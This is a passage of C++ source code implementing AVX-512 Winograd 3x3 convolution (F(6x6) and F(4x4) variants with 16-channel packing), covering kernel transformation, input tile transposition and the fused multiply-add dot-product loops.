_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
r0 += 8;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
output0_tm += 16 * 8;
}
for (; i + 3 < tiles; i += 4)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
r0 += 4;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
output0_tm += 16 * 4;
}
for (; i + 1 < tiles; i += 2)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
r0 += 2;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
output0_tm += 16 * 2;
}
for (; i < tiles; i++)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
r0 += 1;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
output0_tm += 16;
}
}
}
}
bottom_blob_tm = Mat();
// END dot
// BEGIN transform output
Mat top_blob_bordered;
if (outw == top_blob.w && outh == top_blob.h)
{
top_blob_bordered = top_blob;
}
else
{
top_blob_bordered.create(outw, outh, outch, elemsize, elempack, opt.workspace_allocator);
}
{
conv3x3s1_winograd63_transform_output_pack16_avx512(top_blob_tm, top_blob_bordered, bias, opt);
}
// END transform output
// cut result pad
copy_cut_border(top_blob_bordered, top_blob, 0, top_blob_bordered.h - top_blob.h, 0, top_blob_bordered.w - top_blob.w, opt);
}
static void conv3x3s1_winograd43_transform_kernel_pack16_avx512(const Mat& kernel, Mat& kernel_tm_pack4, int inch, int outch, const Option& opt)
{
// winograd43 transform kernel
Mat kernel_tm(6 * 6, inch, outch);
const float ktm[6][3] = {
{1.0f / 4, 0.0f, 0.0f},
{-1.0f / 6, -1.0f / 6, -1.0f / 6},
{-1.0f / 6, 1.0f / 6, -1.0f / 6},
{1.0f / 24, 1.0f / 12, 1.0f / 6},
{1.0f / 24, -1.0f / 12, 1.0f / 6},
{0.0f, 0.0f, 1.0f}
};
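// As in the winograd63 variant above, ktm is the kernel-transform matrix G
// (here 6x3, for Winograd F(4x4, 3x3)); each kernel is lifted into the 6x6
// transform domain as U = G * g * G^T.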
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
for (int q = 0; q < inch; q++)
{
const float* kernel0 = (const float*)kernel + p * inch * 9 + q * 9;
float* kernel_tm0 = kernel_tm.channel(p).row(q);
// transform kernel
const float* k0 = kernel0;
const float* k1 = kernel0 + 3;
const float* k2 = kernel0 + 6;
// h
float tmp[6][3];
for (int i = 0; i < 6; i++)
{
tmp[i][0] = k0[0] * ktm[i][0] + k0[1] * ktm[i][1] + k0[2] * ktm[i][2];
tmp[i][1] = k1[0] * ktm[i][0] + k1[1] * ktm[i][1] + k1[2] * ktm[i][2];
tmp[i][2] = k2[0] * ktm[i][0] + k2[1] * ktm[i][1] + k2[2] * ktm[i][2];
}
// U
for (int j = 0; j < 6; j++)
{
float* tmpp = &tmp[j][0];
for (int i = 0; i < 6; i++)
{
kernel_tm0[j * 6 + i] = tmpp[0] * ktm[i][0] + tmpp[1] * ktm[i][1] + tmpp[2] * ktm[i][2];
}
}
}
}
// interleave
// src = 36-inch-outch
// dst = 16b-16a-inch/16a-36-outch/16b
kernel_tm_pack4.create(inch / 16, 36, outch / 16, (size_t)4u * 16 * 16, 16 * 16);
for (int q = 0; q + 15 < outch; q += 16)
{
Mat g0 = kernel_tm_pack4.channel(q / 16);
for (int k = 0; k < 36; k++)
{
float* g00 = g0.row<float>(k);
for (int p = 0; p + 15 < inch; p += 16)
{
for (int i = 0; i < 16; i++)
{
for (int j = 0; j < 16; j++)
{
const float* k00 = kernel_tm.channel(q + j).row(p + i);
g00[0] = k00[k];
g00++;
}
}
}
}
}
}
static void conv3x3s1_winograd43_pack16_avx512(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel_tm, const Mat& bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
// pad to 4n+2
Mat bottom_blob_bordered = bottom_blob;
outw = (outw + 3) / 4 * 4;
outh = (outh + 3) / 4 * 4;
w = outw + 2;
h = outh + 2;
copy_make_border(bottom_blob, bottom_blob_bordered, 0, h - bottom_blob.h, 0, w - bottom_blob.w, BORDER_CONSTANT, 0.f, opt);
// BEGIN transform input
Mat bottom_blob_tm;
{
int w_tiles = outw / 4;
int h_tiles = outh / 4;
const int tiles = w_tiles * h_tiles;
bottom_blob_tm.create(tiles, 36, inch, elemsize, elempack, opt.workspace_allocator);
conv3x3s1_winograd43_transform_input_pack16_avx512(bottom_blob_bordered, bottom_blob_tm, opt);
}
bottom_blob_bordered = Mat();
// END transform input
// BEGIN dot
Mat top_blob_tm;
{
int w_tm = outw / 4 * 6;
int h_tm = outh / 4 * 6;
const int tiles = h_tm / 6 * w_tm / 6;
// permute
// bottom_blob_tm.create(tiles, 36, inch, elemsize, elempack, opt.workspace_allocator);
Mat bottom_blob_tm2;
if (tiles >= 12)
bottom_blob_tm2.create(12 * inch, tiles / 12 + (tiles % 12) / 8 + (tiles % 12 % 8) / 4 + (tiles % 12 % 4) / 2 + tiles % 12 % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 8)
bottom_blob_tm2.create(8 * inch, tiles / 8 + (tiles % 8) / 4 + (tiles % 4) / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 4)
bottom_blob_tm2.create(4 * inch, tiles / 4 + (tiles % 4) / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 2)
bottom_blob_tm2.create(2 * inch, tiles / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else // if (tiles >= 1)
bottom_blob_tm2.create(1 * inch, tiles, 36, 4u * elempack, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int r = 0; r < 36; r++)
{
Mat tm2 = bottom_blob_tm2.channel(r);
// tile
int i = 0;
for (; i + 11 < tiles; i += 12)
{
float* tmpptr = tm2.row(i / 12);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x12
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _r8 = _mm512_load_ps(r0 + 16 * 8);
__m512 _r9 = _mm512_load_ps(r0 + 16 * 9);
__m512 _ra = _mm512_load_ps(r0 + 16 * 10);
__m512 _rb = _mm512_load_ps(r0 + 16 * 11);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_unpacklo_ps(_r8, _r9);
__m512 _tmp9 = _mm512_unpackhi_ps(_r8, _r9);
__m512 _tmpa = _mm512_unpacklo_ps(_ra, _rb);
__m512 _tmpb = _mm512_unpackhi_ps(_ra, _rb);
__m512 _tmpc = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpg = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmph = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpi = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpj = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpk = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpl = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpm = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpn = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp5 = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(2, 0, 2, 0));
_tmp6 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp8 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(3, 1, 3, 1));
_tmp9 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(3, 1, 3, 1));
_tmpa = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_tmpb = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(2, 0, 2, 0));
_r5 = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(2, 0, 2, 0));
_r6 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r8 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r9 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_ra = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(3, 1, 3, 1));
_rb = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
_mm512_store_ps(tmpptr + 16 * 8, _r8);
_mm512_store_ps(tmpptr + 16 * 9, _r9);
_mm512_store_ps(tmpptr + 16 * 10, _ra);
_mm512_store_ps(tmpptr + 16 * 11, _rb);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 192;
}
}
for (; i + 7 < tiles; i += 8)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x8
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp9 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpa = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpb = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpc = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(3, 1, 3, 1));
_tmp5 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp6 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r5 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r6 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 128;
}
}
for (; i + 3 < tiles; i += 4)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x4
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp5 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmp6 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp7 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_tmp3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r3 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 64;
}
}
for (; i + 1 < tiles; i += 2)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x2
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
__m512 _tmp3 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 32;
}
}
for (; i < tiles; i++)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
__m512 _val = _mm512_load_ps(r0);
_mm512_store_ps(tmpptr, _val);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 16;
}
}
}
bottom_blob_tm = Mat();
// permute end
top_blob_tm.create(tiles, 36, outch, 4u * elempack, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* output0_tm = top_blob_tm.channel(p);
const Mat kernel0_tm = kernel_tm.channel(p);
for (int r = 0; r < 36; r++)
{
const Mat bb2 = bottom_blob_tm2.channel(r);
int i = 0;
for (; i + 11 < tiles; i += 12)
{
const float* r0 = bb2.row(i / 12);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
__m512 _sum8 = _mm512_setzero_ps();
__m512 _sum9 = _mm512_setzero_ps();
__m512 _suma = _mm512_setzero_ps();
__m512 _sumb = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
__m512 _val8 = _mm512_set1_ps(r0[8]);
__m512 _val9 = _mm512_set1_ps(r0[9]);
_sum8 = _mm512_fmadd_ps(_val8, _w0, _sum8);
_sum9 = _mm512_fmadd_ps(_val9, _w0, _sum9);
__m512 _vala = _mm512_set1_ps(r0[10]);
__m512 _valb = _mm512_set1_ps(r0[11]);
_suma = _mm512_fmadd_ps(_vala, _w0, _suma);
_sumb = _mm512_fmadd_ps(_valb, _w0, _sumb);
r0 += 12;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
_mm512_store_ps(output0_tm + 16 * 8, _sum8);
_mm512_store_ps(output0_tm + 16 * 9, _sum9);
_mm512_store_ps(output0_tm + 16 * 10, _suma);
_mm512_store_ps(output0_tm + 16 * 11, _sumb);
output0_tm += 16 * 12;
}
for (; i + 7 < tiles; i += 8)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
r0 += 8;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
output0_tm += 16 * 8;
}
for (; i + 3 < tiles; i += 4)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
